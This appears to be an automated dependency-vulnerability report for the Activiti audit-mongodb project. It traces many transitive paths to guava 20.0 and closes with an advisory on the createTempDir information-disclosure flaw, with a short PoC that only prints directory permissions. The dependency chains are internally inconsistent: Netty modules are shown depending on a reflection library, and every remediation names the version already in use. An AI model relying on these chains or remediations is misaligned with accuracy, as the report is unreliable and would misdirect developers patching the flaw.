Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-codec-http3@4.2.7.Final › io.netty:netty-codec-base@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-codec-compression@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-handler@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-codec-http2@4.2.7.Final › io.netty:netty-handler@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-handler@4.2.7.Final › io.netty:netty-codec-base@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-codec-base@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-codec-compression@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-handler@4.2.7.Final › io.netty:netty-transport-native-unix-common@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-epoll@4.2.7.Final › io.netty:netty-transport-native-unix-common@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-io_uring@4.2.7.Final › io.netty:netty-transport-native-unix-common@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-kqueue@4.2.7.Final › io.netty:netty-transport-native-unix-common@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-handler@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-codec-http2@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-epoll@4.2.7.Final › io.netty:netty-transport-classes-epoll@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-io_uring@4.2.7.Final › io.netty:netty-transport-classes-io_uring@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-kqueue@4.2.7.Final › io.netty:netty-transport-classes-kqueue@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-codec-http2@4.2.7.Final › io.netty:netty-codec-http@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-codec-http3@4.2.7.Final › io.netty:netty-codec-http@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-resolver-dns@4.2.7.Final › io.netty:netty-codec-dns@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.projectreactor.netty:reactor-netty-core@1.3.0 › io.netty:netty-resolver-dns@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.projectreactor.netty:reactor-netty-core@1.3.0 › io.netty:netty-handler-proxy@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.projectreactor.netty:reactor-netty-core@1.3.0 › io.netty:netty-handler-proxy@4.2.7.Final › io.netty:netty-codec-http@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.projectreactor.netty:reactor-netty-core@1.3.0 › io.netty:netty-resolver-dns@4.2.7.Final › io.netty:netty-codec-dns@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-resolver-dns-native-macos@4.2.7.Final › io.netty:netty-resolver-dns-classes-macos@4.2.7.Final › io.netty:netty-resolver-dns@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.projectreactor.netty:reactor-netty-core@1.3.0 › io.netty:netty-handler-proxy@4.2.7.Final › io.netty:netty-codec-socks@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-resolver-dns-native-macos@4.2.7.Final › io.netty:netty-resolver-dns-classes-macos@4.2.7.Final › io.netty:netty-resolver-dns@4.2.7.Final › io.netty:netty-codec-dns@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.projectreactor.netty:reactor-netty-core@1.3.0 › io.netty:netty-resolver-dns-native-macos@4.2.7.Final › io.netty:netty-resolver-dns-classes-macos@4.2.7.Final › io.netty:netty-resolver-dns@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.projectreactor.netty:reactor-netty-core@1.3.0 › io.netty:netty-resolver-dns-native-macos@4.2.7.Final › io.netty:netty-resolver-dns-classes-macos@4.2.7.Final › io.netty:netty-resolver-dns@4.2.7.Final › io.netty:netty-codec-dns@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
Overview
com.google.guava:guava is a set of core libraries that includes new collection types (such as multimap and multiset,immutable collections, a graph library, functional types, an in-memory cache and more.
Affected versions of this package are vulnerable to Information Disclosure.
The file permissions on the file created by com.google.common.io.Files.createTempDir allow an attacker running a malicious program co-resident on the same machine to steal secrets stored in this directory. This is because, by default, on unix-like operating systems the /tmp directory is shared between all users, so if the correct file permissions aren't set by the directory/file creator, the file becomes readable by all other users on that system.
PoC
File guavaTempDir = com.google.common.io.Files.createTempDir();
System.out.println("Guava Temp Dir: " + guavaTempDir.getName());
runLS(guavaTempDir.getParentFile(), guavaTempDir); // Prints the file permissions -> drwxr-xr-x
